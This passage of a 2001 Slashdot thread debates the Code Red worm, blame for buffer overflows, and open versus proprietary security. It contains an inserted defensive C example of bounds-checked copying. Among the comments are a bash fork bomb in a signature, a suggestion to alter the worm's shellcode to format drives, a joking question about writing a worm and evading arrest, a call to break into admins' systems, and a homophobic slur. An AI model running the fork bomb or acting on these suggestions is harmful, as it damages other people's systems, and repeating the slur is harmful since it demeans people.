    Obviously some blame lies with the system administrators, who are running NT systems and don't even think to patch their systems to protect against well-known exploits like Code Red. But you have to admit that there is something really wrong when a company like this has so many humiliating situations occur because of its products, even within its own damn company.

    Microsoft can't even run some of its services on its own software, and instead relies on BSD or other evil technologies.

    Nah, let's not blame Microsoft or its products for these situations. It must be because of something else.

  193. Stop blaming microsoft by MeowMeow+Jones · · Score: 4, Funny

    Blame the creators of C.

    They're the ones who are responsible for buffer overflows.

    --

    Trolls throughout history:
    Jonathan Swift

    1. Re:Stop blaming microsoft by wadetemp · · Score: 1

      Quite wrong. Yes, you know your house can be broken into, no matter how much the realtor insists that it's a safe neighborhood, that the alarm works well, etc. As a homeowner it's still your responsibility to take steps to ensure that your house doesn't get robbed. You test your locks, your alarm. You buy insurance just in case something does happen. Read: you are not an idiot. But as a homebuyer you still have to accept the fact that ANY home can be broken into... no home can be made well enough that it can NOT be broken into.

      The sysadmins didn't test the lock, didn't buy insurance... they just took the realtor at his word. The only ones with responsibility for a resulting break-in are the owner of the system and the criminals who break in. It has little to do with the house, because houses can be broken into. And so can (any, not just MS) complex software.

    2. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      Go away and come back when you get a sense of humor.

      Luser!

    3. Re:Stop blaming microsoft by SuiteSisterMary · · Score: 2

      *Sigh* No shit, eh? What say we go start a Slash-based site for NT called 'backslashdot.org?'

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    4. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0
      the bug MS left in their code could have been easily made by any programmer

      Exactly

    5. Re:Stop blaming microsoft by ClosedSource · · Score: 2, Insightful

      You're absolutely right.

      The reason that some slashdot posters don't want to blame the virus writer is because they're quite happy with Code Red because it makes MS look bad. The enemy of their enemy is their friend .. At least until their ports get blocked by their ISP.

    6. Re:Stop blaming microsoft by tswinzig · · Score: 5, Insightful

      The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

      The only people that think they are getting something secure when they buy/download any operating system are the unwashed masses. The ones that don't know any better. These are the same people that allow the Code Red-style worms to spread.

      The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

      You see, as an admin in charge of machines running IIS and other Microsoft software, I am subscribed to several alert lists, including Microsoft's security list. And when Microsoft releases a patch for anything that can be used to "arbitrarily execute code of the attacker's choice" on a port not blocked by my firewall, I immediately install that patch. The end.

      I'm so sick of people blaming Microsoft. They released a patch well before Code Red. Get over it.

      --

      "And like that ... he's gone."
    7. Re:Stop blaming microsoft by Bryan+Andersen · · Score: 3, Insightful
      Actually IIS is written in Visual C++. Blame M$, they left the buffer overflows available to use in the C++ libraries.

      I rarely use C's or C++'s overflowable library routines. If I do it's only in a quick hack. One doesn't need to use the standard library routines.

    8. Re:Stop blaming microsoft by Felinoid · · Score: 3, Insightful

      When you buy a house, you know for a FACT that glass will break when hit with a hammer.

      Windows is sold as shatterproof glass..
      This means it will not break.

      Linux is sold as theft resistant..
      This means it can break but it's difficult to gain entry..

      Microsoft says:
      When Windows breaks "well all software breaks"
      When Linux breaks "See it breaks.. everyone breaks..."

      Linux says:
      When Windows breaks "Where is the patch?"
      When Linux breaks "Here is the patch"

      Security experts say:
      "Get the operating system patched ASAP..
      If you have the source code.. fix it yourself NOW don't wait for an official patch"

      Microsoft security experts say:
      "Wait for an official patch.. don't do it yourself"

      RL security experts say:
      "Fix it now.."

      RL thieves say:
      "BWAR.. Break Window And Run.... thwarts any security system....
      Wait a while. If they don't fix the window quickly they'll soon forget...
      Once they relax.. walk in the opening and walk out.." (taken from a 1980's text file on how to steal...)

      From TV:
      "We have to wait for Microsoft to release a patch and then we have to test the system to be sure it works correctly and all the apps continue to work correctly." - Microsoft certified System admin being interviewed by a reporter...

      --
      I don't actually exist.
    9. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      If the god has a defect that often leads to the creation of violent humans, then ya I would say the god is responsible.

    10. Re:Stop blaming microsoft by Capt.+Beyond · · Score: 1

      You people are still ignoring the plain fact that the virus writer is in fact, the one to blame.

      --
      -- "Perceptions create reality. By changing your perceptions you change your reality."
    11. Re:Stop blaming microsoft by ToasterTester · · Score: 1

      Actually blame bad SysAdmins, and they are platform independent. If NT SA's had done their job and were up to date on their patches, Code Red would have been a moot point. And don't say stupid NT SA, because there are just as many bad Linux admins with unpatched well-known exploits. Incompetence is platform independent.

    12. Re:Stop blaming microsoft by Cubist.Priest · · Score: 1

      That's silly! I hope you're not serious.

    13. Re:Stop blaming microsoft by jeffy124 · · Score: 1, Offtopic
      Alright, that's crossing the line. Thousands (perhaps millions) of applications have been written in C without trouble before. I believe you are not a programmer who is aware of how good a language such as C is in the long haul.

      Personally, the bug MS left in their code could have been easily made by any programmer, it just happened that this (very easy to fix) bug existed in a high-profile application and also opened up the ability to run arbitrary code on an IIS server, giving a path for Code Red to operate with.

      --
      The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
    14. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      yes, and stop blaming humans for starting wars, because god created humans.

      So obviously god is responsible.

    15. Re:Stop blaming microsoft by greenrd · · Score: 1
      Thousands (perhaps millions) of applications have been written in C without trouble before.

      So? Thousands of C applications don't listen on network sockets at all. Of the ones that do, many of them are too unpopular to be considered as candidates for cracking attempts.

      Personally, the bug MS left in their code could have been easily made by any programmer

      No, any C programmer. It is impossible for this bug to occur in pure Java, or ML, or Scheme, etc. etc. You've proved our (somewhat tongue-in-cheek) point - C is to blame.

    16. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      New languages don't make programs vulnerable to buffer overflow. This is a C thang. But since most open source programmers still use C because they are stuck back in time and refuse to move on, no one will be admitting it.

      Better to blame Microsoft.

    17. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      If you look at C that way. C was meant to allow you to make any functionality you want. You could probably build hardware that cannot ever be networked for those applications but most people use the inherent flexibility in the hardware and implement it as needed. If you need security you should not be using raw C any more than you should be trying to ride a boat motor in a bath tub; think of a boat and a lake as a nice secure library.

    18. Re:Stop blaming microsoft by JAK · · Score: 3, Funny

      You're absolutely right. Note to self: If I'm ever writing an OS, be sure to use java...

    19. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

      bah. You can overflow a buffer regardless of language. Blame the people who wrote FORTRAN, or for that matter, the people who developed assembly.

    20. Re:Stop blaming microsoft by mr_exit · · Score: 1

      You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system.

      One thing my dad told me years ago was: "Locks are only there to stop honest people making mistakes" and the same has been proven with computer systems.
      Even the computer equivalent of a bank safe still isn't enough these days.
      But that doesn't mean that we should all use the microsoft bank which is just a bucket in the street with a good marketing campaign.

      --

      -------
      Drink Coffee - Do Stupid Things Faster And With More Energy!
    21. Re:Stop blaming microsoft by Felinoid · · Score: 1

      This is not quite true...

      It is unlikely your house will be broken into if you're living in a "safe" neighborhood.

      Criminals prefer easy targets... this has been proven time and time again...

      A criminal will target Windows over Linux any day..
      Linux CAN be cracked... Windows is an easier target....
      [Of course if you're really serious about security you'll look into BSD or Solaris and into a steel door and a dead bolt...
      As for my car.. if you want it that bad you can have it...]

      --
      I don't actually exist.
    22. Re:Stop blaming microsoft by fuckallnerds · · Score: 0

      don't forget that he sucked dick, too. that negates anything good that he did in his life. man, i hate gay brits, which basically means that i hate all brits.

    23. Re:Stop blaming microsoft by ryanvm · · Score: 1, Redundant
      I'm so sick of people blaming Microsoft. They released a patch well before Code Red. Get over it.

      You're a moron. Windows NT/2000 has some very serious design flaws with regard to operating system security. That is the source of their security woes. Don't the countless "root" exploits that exist for NT demonstrate that to you at all?

      If you truly are an NT server admin then I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.

    24. Re:Stop blaming microsoft by dgp · · Score: 2, Informative

      The C language is being efficient when the for loop that copies the input buffer into RAM is not checking for an end of buffer condition. If you want that done automatically, use a home-brew memcpy or use a different language with bounds-checking like Java.
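As an added example (not code from this post, from Bryan Andersen's post above about avoiding overflowable library routines, or from IIS), here is the kind of bounds-checked copy routine the comment has in mind, used by a small request-line parser that copies the query string into a fixed buffer and rejects anything that would not fit. The names `copy_bounded`, `extract_query`, `oversized_rejected` and `QUERY_MAX` are assumptions for this example, and the sample requests are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed for this example: size of the fixed buffer the query string is
 * copied into, standing in for a small stack buffer in a request handler. */
#define QUERY_MAX 32

/* Bounds-checked copy, the "home-brew memcpy" the comment above suggests.
 * Copies src_len bytes into dst only when they fit with room for a NUL;
 * returns the count copied, or -1 (dst untouched) when they would overrun. */
int copy_bounded(char *dst, size_t dst_size, const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    if (src_len >= dst_size)            /* no room for the data plus terminator */
        return -1;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return (int)src_len;
}

/* Copies the query part of a request line ("GET /x.ida?abc HTTP/1.0" -> "abc")
 * into a caller-supplied fixed buffer. The scan is bounded by req_len and the
 * copy by dst_size, so an over-long query is reported with -1 instead of
 * overwriting whatever lies past dst. Returns the query length, 0 if there is
 * no '?', or -1 if the input is rejected. */
int extract_query(const char *req, size_t req_len, char *dst, size_t dst_size)
{
    size_t start = 0, end;

    if (req == NULL || dst == NULL || dst_size == 0)
        return -1;

    while (start < req_len && req[start] != '?')   /* find '?' within bounds */
        start++;
    if (start == req_len) {                        /* no query at all */
        dst[0] = '\0';
        return 0;
    }
    start++;                                       /* skip the '?' */

    for (end = start; end < req_len && req[end] != ' '; end++)
        ;                                          /* query ends at SP or req_len */

    return copy_bounded(dst, dst_size, req + start, end - start);
}

/* Builds a constructed request "GET /default.ida?XXX... HTTP/1.0" whose query
 * is qlen bytes of 'X' and returns 1 if extract_query rejects it, 0 if it
 * accepts it (-1 if qlen is too large for this demo's scratch buffer). */
int oversized_rejected(size_t qlen)
{
    static const char head[] = "GET /default.ida?";
    static const char tail[] = " HTTP/1.0";
    char req[512];
    char query[QUERY_MAX];
    size_t head_len = sizeof head - 1, tail_len = sizeof tail - 1;

    if (qlen > sizeof req - head_len - tail_len - 1)
        return -1;
    memcpy(req, head, head_len);
    memset(req + head_len, 'X', qlen);
    memcpy(req + head_len + qlen, tail, tail_len + 1);   /* includes the NUL */

    return extract_query(req, strlen(req), query, sizeof query) < 0;
}

int main(void)
{
    char query[QUERY_MAX];
    int n = extract_query("GET /default.ida?id=42 HTTP/1.0", 31, query, sizeof query);

    printf("short query: rc=%d value=\"%s\"\n", n, query);
    printf("31-byte query rejected? %d (fits in QUERY_MAX-1)\n", oversized_rejected(31));
    printf("200-byte query rejected? %d\n", oversized_rejected(200));
    return 0;
}
```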

    25. Re:Stop blaming microsoft by mpe · · Score: 2

      Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability.

      It used something left enabled by default which almost nobody actually needed. Who actually uses the default.ida file in the first place? Also the Morris worm was way before NT even existed...

  194. So how did your site fare? by Anonymous Coward · · Score: 0

    How were everyone else's companies affected by this? I've heard rumors it was pretty bad at Microsoft and IBM, how bad was it other places?

    1. Re:So how did your site fare? by TeraCo · · Score: 1
      > I can't understand why nobody is questioning this decision.

      I think if your admins can't keep an NT server up to date, they aren't bright enough to think up a new infrastructure.

      FYI: My company was fine, although we really only run our authentication/exchange and a few other misc things off Win2K. Our best defense is: A large firewall of unix boxes between us and the real world, and virus scanners on the exchange boxes.

      Melissa never affected us, nor did any of the other outbreaks.

      --
      Not Meta-modding due to apathy.
    2. Re:So how did your site fare? by Anonymous Coward · · Score: 0

      At my company no one noticed. I've occasionally checked Apache's logs to see how many attempts there have been, but that was just idle curiosity.

  195. good by Anonymous Coward · · Score: 0

    I urge all of you who were infected by code red to fix your computer so my apache logs don't get filled up with a bunch of crap.


  196. Re:FUD ALERT by Anonymous Coward · · Score: 0

    Backups are for disaster recovery. I have put in Sun Patch clusters without any "disasters" so no need to recover any files. We do back everything up for user error (the most common event), hardware failures and the like. Somehow you have learned to accept that a service pack or patch cluster just breaks things and is another reason to have backups.
    Recovering from backups is not a luxury to be relied upon by shoddy engineering because you may have not lost data but you have down time. That would make you the "negligent moron" to let a vendor talk you into it.
    I believe there are flotation devices on aircraft but do you really want to use them on the odd flight? "Don't worry we have a raft".

  197. your mom by blendin · · Score: 0

    your mom is such a slut fool

  198. Re:Remind me again... by anim8 · · Score: 1
    -reemul who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working

    A real web server has no use for a sound card.

  199. Re:Warhol Worm proposed: 15 minutes to total infec by greenrd · · Score: 1
    Any opinions on (a) if this would be inherently illegal and (b) how you could minimise your chances of getting arrested if you wrote one?

    Completely hypothetical questions, of course. ;)

  200. Re:FUD ALERT by Holophax · · Score: 1

    This comment would almost be worth moderating as funny, as it has been, with the exception of the fact that Service Pack 6 did NOT stop people from accessing the TCP/IP stack, it prevented people from using ports above 1024. Granted, it's still a major error, but a little different from what the original poster implied.

  201. Re:Unforgivable! by Anonymous Coward · · Score: 0

    The only machines shut down by this script are those infected by the worm. I doubt too many of us will miss those machines that are sucking down our collective bandwidth.

  202. Re:FUD ALERT by crywolf · · Score: 1
    Funny, I've never been paranoid about installing/patching anything, regardless of the operating system. It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks.

    No, Windows sucks entirely on its own merits, and in this case, I am not a negligent moron. This was a fresh install of a public access machine. We have *no* Windows servers. If you like using something that requires backups mid-install, that's up to you.

    But you're right about backups. I've learned that I should make an emergency rescue disk with registry backup, followed by a reboot, after every single app I install, so I can catch whichever app it is that corrupts the registry (automatically backed up by Windows after being corrupted?). A minor glitch which will completely destroy the operating system.

    --
    CAUTION: Product may be hot after heating
  203. What would be funnier.... by Anonymous Coward · · Score: 0

    Is to change the shellcode to stop the machine from coming back after a reboot. I'm not sure if winnt/2k allow the use of /y after a format command, but I'm sure that would grab some media attention. Even if it didn't it would provide some evil satisfaction to all those people sick of seeing their logfiles grow night after night.

  204. ever hear of recalls? by Anonymous Coward · · Score: 0

    Actually you would be surprised about how often recalls happen on cars. Granted they aren't "patches" per se, but they do occasionally have recalls for problems that they deem serious enough. But you know what? Most of the recalls are voluntary. That is that people actually have to know what kind of car they have and where to look up recall information on it. Frequently they won't get notification from the company they bought it from if anything that was recalled wasn't that serious of a defect. So in that respect, cars are like computers. The owners are STILL RESPONSIBLE for finding out about them and taking their cars to get fixed. The automakers won't just drive to your house and fix them automatically. And I guess as much as I dislike M$ and some of the things that they do, the same thing goes for computers as well. Even non-evil companies make mistakes and release patches. So it's up to each user to be a system administrator and check for this sort of thing. It's not like M$ is going to hold you by the hand and patch your server for you. You should at least be glad that there is a patch, I'd bet money that M$ would hide this problem if they could.

  205. yes-but by Lumpy · · Score: 2

    IIS is written in Visual Basic...

    --
    Do not look at laser with remaining good eye.
  206. Blame Microsoft! by extrasolar · · Score: 2

    Blame Microsoft!
    Even though the kiddies did it,
    Microsoft will take shit for it!
    Well, they're not a real company anyway.

    (apologies to the southpark people)

  207. IIS is not installed by default! by badzilla · · Score: 1

    Why all these stories of folks with Windows workstations who didn't even know they were running IIS and were surprised to be told they had code red etc. etc.?

    NT4 requires you get a copy of the "Option Pack" CD before you can install IIS. W2K Pro needs you to re-insert the CD after you installed the OS and click on yes-I-want-IIS. Both pretty hard to do by mistake.

    --
    "Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
  208. Automatic reply to owners of the host - kinda by MavEtJu · · Score: 1

    I've made a small script to do this. It takes the hostname or IP address of a machine to find out information from the whois-database or the SOA fields of the zone.

    It's available from http://www.mavetju.org/networking/tools.phtml as coderedspammer.

    Don't think that this will solve your problems, because there are many many badly misconfigured mailers/dns-servers/whois-databases on the internet. See http://www.mavetju.org/networking/whymailfails.phtml for an overview.

    Edwin

    --
    bash$ :(){ :|:&};:
  209. Re:Here's how open source would be better... by cburley · · Score: 1
    I wrote:

    Can you point to a single thing I said that shows that I "forgot" this one important detail??

    You replied:

    By assuming that source code makes everything better.

    I asked you to quote me, and instead you just make something else up out of whole cloth?

    Look, I might well say that having source code hardly ever makes anything worse, but unless a person has a very poor grasp on logic, they're unlikely to believe that a) that means I believe that source code makes everything better and that b) that means I believe that even Ronald Reagan, in the throes of Alzheimer's, can personally negotiate the source code for Apache to find security flaws.

    More likely, if you both valued my input and were an honest person, you'd admit that, time and time again in this thread, I've pointed out that the source code is a benefit to everyone because they, or someone they hire, can openly read, modify, discuss, and test it.

    It is simply not a matter of having source code available that makes it secure.

    Here you continue setting up your strawmen, imputing them to me, and knocking them down. I hope you're having fun; for myself, I tend to tire of arguing with people who pull this stunt.

    Can't you simply accept my statement that I did not forget that not everyone can read source code is true? Or are you 100% convinced that I'm either a liar or somewhat self-delusional?

    You still have not commented on sendmail

    Indeed, I have not commented on a bloated, monolithic Mail Transfer Agent that was originally designed for use on a non-hostile Internet and has been known to have many security holes as it has been grown into something designed to be suitable for use on a hostile Internet, while adding all sorts of features that needn't be part of the core product.

    Why should I? After all, you've already discussed it, and I've seen nothing you've said about it worth rebutting -- as far as I know, it's all correct.

    What does that prove? I believe it shows the validity of my arguments, especially the one about how large, monolithic applications are more likely to be very difficult to secure than smaller ones built out of discrete, interchangeable components, like qmail, all else being (pertinently) equal.

    My guess is, people concerned about security would flock, like birds not flies, to its source code, find out it was a stinking pile of dung, and, not being flies, decide they'd have to start from scratch rather than spend the rest of their lives trying to secure something like that. Which is probably why we now have qmail, an alternative that is radically different from sendmail in almost every way, except they both are "free software" in most ways. How many alternative MTAs for Microsoft OSes came into existence because security-conscious people looked at the source code of Exchange (or whatever it's called) and decided to start from scratch, I wonder?

    (And, of course, an app like sendmail is much easier to usefully distribute in proprietary form than one like qmail; the latter is too easy to reverse-engineer in digestible chunks.)

    For the same reason Ford "lets" people drive drunk? It's the government's job to protect people from each other--not Microsoft's.

    Yet, as I pointed out, Microsoft certainly took it upon itself to not let people print pictures it decided they might not have a legal right to do so.

    Therefore, by allowing non-admins to easily enable IIS, they have about the same level of culpability as would Ford if it made sure that any 5-year-old could successfully turn on and drive an Explorer as a means to ensure wide market share.

    Remember, I made a fairly broad point about Microsoft, and other proprietary-software vendors, effectively disarming customers (willingly) by not allowing them to see the source and find/fix/discuss the security problems themselves. Do you truly see no additional culpability coming upon these vendors or their end users as a result of this unilateral disarmament against enemies who, in some cases I would think, did not similarly disarm?

    Note I am not talking about legal culpability, nor trying to make a distinction regarding exactly who -- MS or a given MS customer -- is culpable. Certainly Linux developers and users aren't culpable for bugs in MS IIS, and I argue that, in the combination of IIS users and MS, its distributor, there exists substantial culpability for any security flaws that are exploited by black hats and that might have been usefully exposed earlier, had the source code been widely and publicly available.

    However, I guess I do hold MS and other proprietary-software vendors culpable for willingly creating an environment -- a market, if you will -- in which end users don't believe they should care or know about the very concept of source code, the security implications of not being able to view it, etc.

    (Sure, they "just wanted to make a profit", which is fine, but let's not allow that privilege, or right, to cause us to overlook the fact of their culpability by taking the actions they did, especially since that would disadvantage those vendors who did strive, more than others, to inform their customers regarding security concerns, give them some degree of access to source code at least, and so on. Just because a company X does Y to make more profit does not mean we can no longer discuss whether Y contains unfortunate, even "evil", portions. That is, I'm not debating the evilness of corporations -- I'm trying to clarify some issues I believe you've obscured in your posts regarding the value of the respective forms of software generally.)

    Microsoft was not expecting a bug in their IIS server anyways.

    Then the company is run by fools, which I doubt. Proper engineering, especially of large, complicated systems, includes assuming there will be failures, and handling the risks accordingly.

    (You seem to not know much about software engineering, based on statements like that and the other one you made about kernels not being interchangeable. Are you seriously trying to tell people that, without understanding even the most basic concepts of software and vanilla engineering, your views on security trump those of us who do have some understanding of these issues?)

    You do have to back up your claim because the original poster implied (if not outright claimed) that open source produced software that was more secure than proprietary.

    I need to back up my claims because of something someone else said? Bah.

    Besides, here is the first chunk of text to which you responded, as written by the original poster:

    Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

    Seems like the author of that quote left himself plenty of wiggle room between what he said and what you claim he "implied". I don't know if I'd say it quite as he did -- perhaps he has experience and expertise I don't, to back up his claims -- but I agree with the general thrust, yet don't see him as quite saying that open source produces more secure software than proprietary (a statement that can be interpreted in so many ways, it has little meaning at the point we're at, which amounts, nearly, to debating how many angels can dance on the head of a pin).

    An example of one thing to which you have not responded is something I consider to be pretty much an "endgame" in a discussion like this, and that's the fact, pointed out by the original poster and myself, that no proprietary software (of the type that needs to be secure) is ever shipped after its source code has been widely available for open discussion, for testing, even for modification, by the general public. Yet that sort of activity is typical for equivalent free software, which goes through alpha and beta releases in which the source code is, put simply, "there".

    Do you really, truly, honestly believe that having the source code widely reviewed and discussed by people with no financial interest in simply parroting a corporate line about security offers no substantial advantage in terms of ensuring there aren't fundamental, or even obscure, flaws in the design and/or implementation of the product?

    If you do believe that, then you believe that all the bugs found during the alpha and beta periods of free-software products (including mine) were pretty much irrelevant, or would have been found anyway, i.e. without the source being available.

    In that case, I can tell you first-hand that your belief is utterly without foundation. But unless you want access to my email/USENET archives, or wish to explore Linux kernel and other archives yourself, to research the importance of source-based bug-finding during alpha and beta test periods, you'll have to either a) accept that your belief is unsubstantiated or b) call me, and probably plenty of others like me who've developed free software, liars.

    So you are saying lets not innovate?

    Sheesh, more strawmen. Of course, I never said that. I did point out that free software gives users more choice as to when and how to innovate, upgrade, and so on. Why you insist on excluding the middle ground is beyond me, unless you really care more about appearing to win an argument (using whatever means are at your disposal) than actually learning something that might challenge your cherished assumptions.

    I'm sick of Slashdot readers with their holier-than-thou attitude spreading FUD about proprietary software.

    Then stop reading /.. Seriously. In fact, you might as well drop the last two words from your sentence, or the last five, or even just use the first five, to say all you, or anyone else, need say. Most of the time I'd probably agree.

    The mistake I think you made is picking the wrong example, and the wrong people, to respond to as if they, and we, were "typical" of the stuff, and people, you're "sick" of.

    Further, if you're thinking that /. readers somehow represent a coherent viewpoint on this or any other subject, dispense with that notion immediately. It's foolish to believe that of almost any group of more than ten people, much less one of more than 100,000, even if they are voluntarily and freely choosing to air their views in a particular forum.

    I'm not trying to sound harsh or have an attitude.

    I don't know which is more disturbing: to believe you are exerting an effort to do so, or to believe you aren't.

    That is a far cry from denouncing all proprietary software as insecure based on just one vendor (MS).

    Another strawman, since neither I nor the original poster made such a denunciation.

    You can not prove beyond a shadow of doubt that the source code you have in your hand (drive, whatever) is 100% secure.

    More excluding of the (incredibly wide) middle ground, in which a 99% assurance after a careful audit of clean source code is preferable to a 10% assurance that consists entirely of the vendor saying "yeah, it's secure", plus whatever experience in the field might be on hand.

    You might also wish to investigate a concept called "proof-carrying code", and similar "proof-based" systems, and compare their deployability in a) a proprietary-software world versus b) a free-software world.

    You seem to not trust proprietary vendors, and I do think this has much to do with Microsoft's behavior (and their negative image).

    I can understand why you'd have that impression generally, but it does not apply to me. I use Microsoft in my examples of reasons to distrust proprietary vendors solely because they're such a well-understood target. But my experience goes back much further than that.

    I remember discovering a bug in 64-bit floating-point comparisons in a (rather obscure, thankfully) computer (I worked for the company designing and building it at the time). Something like, if the difference began in the 33rd bit in a certain direction, the result of the comparison would be wrong.

    When I pointed this out to the VP of Engineering, he made it clear the company would not be issuing notifications to the customer base, and certainly not replacing the CPUs already in the field to fix the problem, despite the fact that those particular machines' main selling point (compared with other offerings) was that they did 64-bit floating-point "natively".

    How is this kind of willful ignoring, and refusal to communicate to potential victims, of the problem possible in a free-software development project large enough to support most pertinent products? (Even though I described a hardware flaw, I've had similar experiences, though harder to explain simply, in proprietary software companies.) The answer: it pretty much is not possible, because authors of free software simply aren't that interested in hiding information, especially info of that sort.

    (Proprietary-software vendors, of course, spend significant human, financial, and legal resources ensuring all their employees, contractors, consultants, vendors, and so on, know the importance of keeping things secret -- even things that could be life-or-death issues.)

    I seriously hope you do not go around looking at the source code for the Linux system to find flaws.

    Um...why not? In fact, I did casually scroll through some Linux kernel source code around 1992 or 1993, found a bug involving group (vs. owner or world) access in the filesystem, reported it along with a proposed fix, it got accepted.

    Why would you have a problem with that?

    As far as I can tell, there are a variety of projects around the world that consist of people writing tools that look for certain kinds of bugs that compilers don't find in source code, and using GNU/Linux source code for input. These tools will not likely get run by proprietary vendors (besides, if they do, how will you know for sure they've been run and the results used to improve the product?); certainly their output won't be published, as it has been for the Linux kernel, at least. (Wish I could remember the name of the one project like this I'm sure came about this way, but if you skim Linux kernel discussion archives, perhaps you can find it.)

    If you take into consideration the large number of Linux programs then the "eye-count" becomes diminished quickly.

    Hey, I "get" your points, but they don't stand up to historical scrutiny, which you can't exactly be blamed for not realizing, because they draw no useful lines beyond which the value clearly diminishes to the point of irrelevancy.

    Specifically, ten-plus years ago, your predecessors (on newsgroups like gnu.misc.discuss) used pretty much the same logic you're using to explain why free software might have its "niche", beyond which it could not possibly expand, due to lack of resources, qualified programmers, etc.

    Examples of things free-software solutions would "never" exist for, from memory (and some of this goes to before google/dejanews coverage of gnu.misc.discuss, which I gather is circa 1994, but I've got my own private archives):

    • Operating system kernels (too technical, too few people with enough expertise, wouldn't be secure since nobody would bother with things like code reviews, i.e. no OpenBSD project would exist)

    • Fortran compilers (not sexy enough; I fixed that one myself ;-)

    • Decent GUIs (i.e. no Gnome or KDE at all, certainly not two completely independent and competitive projects!)

    (I know, I know.. free software can make money by selling support, but this is capitalism. Make as much money as you can, right? Which leads to more ignorance; users aren't aware that cheaper alternatives exist. In many cases, users really do not care whether they pay extra or not. They just want the computer to "do as I say").

    In the paragraph containing that parenthetical statement, you express much hope/optimism about proprietary software, which might not be unfounded, but I'll note two things:

    • It's not clear to me proprietary vendors are going in the more lenient direction -- in fact, things like the DMCA, plus inferences based on what the MPAA and RIAA are doing (and getting away with), suggests that the vendors that succeed will be those that lock up their software even further, by "hiding" it behind network-based services (.NET?), putting even more legal and practical constraints on finding and openly discussing flaws such as security holes, etc.

    • To the extent such vendors do go in the direction you hope, the less they become distinguishable from free software anyway. (You've got to look beneath the labels in some cases, e.g. qmail, especially when making assessments like we're making.)

    Regarding the parenthetical statement, especially the part about capitalism, if you are interested, and can be really nice and stop creating strawmen, claiming I said things I didn't (instead, please just quote, okay?), I'll be happy to respond, probably via email, since you might find my views on that subject (free software vis-a-vis market forces) fairly interesting, if not convincing.

    I don't know enough about DMCA

    It's worth your time to explore it, and learn who supports it, and why -- even just for the security implications of what you'll find out. (And I admit to knowing only a bit of what's going on, but enough, IMO, to speak somewhat authoritatively on the intersection of issues we're discussing.)

    --
    Practice random senselessness and act kind of beautiful.
  210. Can we please stop picking on the MCSEs? by Meorah · · Score: 1

    They've only got until the end of the year to screw up anything else. If they aren't win2k certified by Dec 31, they're not MCSEs anymore. And for those of you who say that the win2k certification can't be THAT much harder than nt4, I have this to say to you: Don't knock it if you don't have it. Or more precisely, don't knock it if you can't take the time to get it yourself.

    --
    Protector of Capitalist views,
    Meorah
  211. about time, I want my internet access back by Anonymous Coward · · Score: 0

    I work for a school in Victoria, Australia. We have had no internet access for over a week due to Code Red. It would seem that all the schools in Victoria using the government schools network, aka "VICone", have been in the same position; this is because we are all linked through a poorly configured WAN.
    Code Red apparently has spread to a large number of the department's administration servers and has caused major bandwidth contention, with packets flowing around our WAN.

    All I can say is thank god for Novell NDS and Apache running on Linux,

    //RANT//
    Why doesn't Microsoft just take their domination to the next level and include an auto-update component which can't be removed and can't be disabled, kinda like IE.
    //END RANT//

  212. Re:Not the mess they made... by cyclist1200 · · Score: 1

    I hate to write a "me too", but I have been waiting to see if somebody would bring this up. Most of the traffic I have seen over the past week has been from machines that don't have any web sites running. Therefore I have to assume the user is unaware that they are running IIS, and is probably running W2K Pro, on which IIS is not installed by default. Some of this blame has to shift away from Microsoft. We have to stop pursuing the notion that the ordinary user need know nothing about their computer, or that it is too hard to learn, and start providing some basic, common-sense knowledge. It really is that simple. Security can be a basic knowledge component.

  213. Re:Not the mess they made... by PurpleeDragon · · Score: 1

    NT admins now are paper IDIOTS. They needed to come in our field and UPSET what we worked so hard on, RESPECT, which these new IDIOTS know nothing of. I WISH the impossible WISH: "they all get out of this field and go back to being anything but what US few have built our field to be". YOU idiots, yes I am talking to about 80 percent of you, should leave our FIELD. Taking a LAME test does not mean you earned the right to be called MCSE or computer anything, but from us Real MCSEs and Oldtimers you get the title you can hang high: "LAAMERS". What gets me is that these companies let this crap go on because they pass tests. LOL. But yet they have no experience whatsoever, or their experience is false. I have interviewed the NEW breed of MCSEs for a bit and found them to be people of low, low skills. Sad, I tell ya. AKA: Today's exploits should be like before. NO ONE POST THEM. Just RAPE their systems and get them fired; let them get the AXE for being the NT JOKEs they are.

  214. Wow, it really is stopping by mashy · · Score: 1

    Yesterday I got an automated phone message from my local RoadRunner provider telling me about CR, whether or not I could be infected, and where to download the patch.

    I woke up this morning to find a pop3 connection visible in my tail -f'd syslog -- from 3 hours before! At this point I'm getting around 3 CRII hits an hour, down from about 6 a minute yesterday. The data transfer light on my modem is also calm.

    Has anyone else noticed this yet in their areas? My cable company was late in the process of sending out messages and warnings but it seems to have worked overnight. What are some other experiences?

    1. Re:Wow, it really is stopping by newimprovedmedia · · Score: 1

      I am still receiving many requests for the default.ida file on my apache server, like 10 to 20 an hour. Also my network activity light is blinking like crazy. I am wondering if I should start blocking IPs or what?
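
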